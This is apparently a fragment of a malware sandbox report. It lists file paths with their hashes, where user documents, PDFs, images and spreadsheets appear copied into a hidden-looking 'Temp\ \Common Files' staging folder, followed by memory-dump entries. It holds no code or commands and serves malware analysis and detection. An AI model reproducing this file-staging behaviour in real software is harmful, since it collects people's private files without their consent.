C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1006088276c534d3c860cb06cc27c19e |
| SHA1 | 5a9fd1e3d9957b026aaa13f313cc899160e7fc19 |
| SHA256 | 64f187a56698b959802dcca5c5a9c097cdd2e6897364e0148e5cda14023dafea |
| SHA512 | 318d37d9ef174aff0041c6f3cc14c6bcc27f62ba55333d2b7d7f50fbafa927e3a35c83359d4158dfa314467e0938be1486ef4b56221b7b57c32f73727e16bd1b |
memory/4864-292-0x0000000005E20000-0x0000000005E6C000-memory.dmp
memory/3384-297-0x0000000074BF0000-0x0000000074D26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\AddRedo.docx
| MD5 | 4d64ab44beccabe19b2ffd4ad36cce86 |
| SHA1 | c3e1acafa63753e88317c154b54f32faf65b08cb |
| SHA256 | 1686d5a90b78b04f567fe1d750ff2f76da7589a38e54170bb4a4524b1507f89e |
| SHA512 | dec4be574d4a24de66eff4b3dc40aa7cc59a89d096459d353ce37b4b47dfe4dcd058bed9b52cac72458c981caedaf186ef1387bc0cffabb65778c8b059ee114c |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\AssertConvertTo.doc
| MD5 | ff40a94640e4214deee16e77f0712ecd |
| SHA1 | 7d265d2d220d73651cd3e1e07d7ea3e02dda79a5 |
| SHA256 | 36a247cde0b80f12425bf09acc5b6cfa14bb2a621ecb83c1da2b2977892a8b79 |
| SHA512 | 89dfb6b80a4fc14b8a064c6244459c38953d3e84c30c96bc5d8e28a3d7a3a33b04b0464c35f887da5d4346aeaedf594f9ad339be084f0c87453040badbfc8025 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EnableEnter.pdf
| MD5 | dd8dd7a0402ecd67a83d29fc90131927 |
| SHA1 | 8aedc3e6204c5f862be08195f558ced52be16190 |
| SHA256 | 0c136efbeb5ecfd3786991f6acbf112be4e219d4dece0977d73269dfbe1c7c6f |
| SHA512 | 0109c2a759fc10813ea1641ed259595ec58309bf8d1029bb3c54b37cb8ddd3209d4d95dd9e3ccd152330858f9162e8db585a83b0408b2f547bd38256123264d7 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\LockClear.pdf
| MD5 | 33d389aca97e0c2ab7ec7ab74634a820 |
| SHA1 | 56e6d3d3098b1903fa02ed1f499d8d259b64433b |
| SHA256 | e9f00efc50a5cb18266e8b6856c45ae913ba64d71344adb435f73f17b37a7f82 |
| SHA512 | 4c733a23bed0b9c760c7fece4e401c9e88441a1b68642e76df79d94bc201dda52fe595c424cfb2d395a6a22c98867f42db955d693ddb93709e0ba31e8c7c0c69 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RepairBackup.wps
| MD5 | 2159cedd88325a059199dcf12f1b4900 |
| SHA1 | 17266bb2ce23cdd130ad25efb55e33f94bf18b82 |
| SHA256 | af3d21f68a31831c3c220dd495a353da1fbd66d833f86b4d3802aabe3c8f8e55 |
| SHA512 | a1014bd617b647d1b8c5643a4cba69b7d93eff1a2b332085c31c94dbb94d05771c2afc22c8b7c6d5d41ea5e29a0fb1fb3316eb912f4e65d6b1130841da80c54f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ResolveShow.doc
| MD5 | 67d29096c342f82ec8131d5f3cca9757 |
| SHA1 | c97675b30e55365c438789e83d69e2ce35761202 |
| SHA256 | 21466a5666189334c55f03c9e554433dd4c9763764f3a509ce4904235991bc96 |
| SHA512 | 7b9a68ac44fb342a41b3c38f771e5e4e2bbd0d84f1c3bb7668a187acb6ce1cdf9bfb4e78de5af58ea6188186bbf982288f5cade55dba25f41d40158857822181 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ApproveInitialize.png
| MD5 | 9c5ca9bd53ed968ab7b3c1e18dfdeab6 |
| SHA1 | 81423d1d183637e619f619b21bedda1b71dd1665 |
| SHA256 | c43e03e8a4fa54d29fa752f199093ec2249346f8cf12e52eda0b9f6a30b2efa2 |
| SHA512 | 258b256a1660d2139853f87f1ce8f784ba0de7737c55757d0881c80bf3c715f5298864e394d9b2bef4f60398b56ae66d23f66bd6c31ec8ecc0a8a0a306a362ab |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ConfirmUndo.png
| MD5 | 9b7b05f8215d5009ad8bbcb4b4bdaa17 |
| SHA1 | 339dc4994755517fe514fd4647f623246c144b8e |
| SHA256 | 228267da6a2a8c24304cd7a090a1ef53115c20b40a626b08b956235fa2f2af48 |
| SHA512 | d79c35fb5a1b1428f76e08ac62cfac2dc7e82bcdd1749fdc016602d5483d25172ff7afd0439115e1f3d5f8391f5f11b6fdb4ddff8885e2bccedab32629842396 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\InvokeConvert.xls
| MD5 | 9304af50855fd2935b2e864c55dac5d3 |
| SHA1 | a9bea86acad3157ceb4ac84860c8cd8c607a97ed |
| SHA256 | 76d442e473e29d317ccaf99d732642d246d33955bea3f6e98cac65013df58832 |
| SHA512 | 94f0b7687db1a54c03445bd59b19033dfc57314318a7611fbb3bff41a9a2897c8ccc339f18e6917338bf6bfde146db5e6134a278566c5e268ec788fdd2711030 |
memory/4064-323-0x00000000063F0000-0x0000000006744000-memory.dmp
memory/4064-324-0x00000000069F0000-0x0000000006A3C000-memory.dmp
memory/3384-341-0x0000000074BD0000-0x0000000074BE6000-memory.dmp
memory/3384-340-0x00000000746A0000-0x00000000747B8000-memory.dmp
memory/3384-337-0x0000000074850000-0x0000000074AAA000-memory.dmp
memory/3384-336-0x0000000074AB0000-0x0000000074B44000-memory.dmp
memory/3384-335-0x0000000074B50000-0x0000000074B78000-memory.dmp
memory/3384-332-0x0000000074BF0000-0x0000000074D26000-memory.dmp
memory/3384-327-0x0000000074DB0000-0x0000000074DCF000-memory.dmp
memory/3384-326-0x0000000074E00000-0x000000007530A000-memory.dmp
memory/4800-342-0x00000000061A0000-0x00000000064F4000-memory.dmp
memory/4800-352-0x0000000006C10000-0x0000000006C5C000-memory.dmp
memory/3384-354-0x00000000039E0000-0x0000000003C3A000-memory.dmp
memory/3384-371-0x0000000074DB0000-0x0000000074DCF000-memory.dmp
memory/3384-380-0x0000000074AB0000-0x0000000074B44000-memory.dmp
memory/3384-384-0x00000000746A0000-0x00000000747B8000-memory.dmp
memory/3384-383-0x00000000747D0000-0x00000000747DC000-memory.dmp
memory/3384-382-0x00000000747E0000-0x00000000747F0000-memory.dmp
memory/3384-381-0x0000000074E00000-0x000000007530A000-memory.dmp
memory/3384-379-0x0000000074B50000-0x0000000074B78000-memory.dmp
memory/3384-378-0x0000000074B80000-0x0000000074B8C000-memory.dmp
memory/3384-377-0x0000000074BD0000-0x0000000074BE6000-memory.dmp
memory/3384-376-0x0000000074BF0000-0x0000000074D26000-memory.dmp
memory/3384-375-0x0000000074D50000-0x0000000074D68000-memory.dmp
memory/3384-374-0x0000000074D30000-0x0000000074D4B000-memory.dmp
memory/3384-373-0x0000000074D70000-0x0000000074D97000-memory.dmp
memory/3384-372-0x0000000074DA0000-0x0000000074DAD000-memory.dmp
memory/3384-370-0x0000000074850000-0x0000000074AAA000-memory.dmp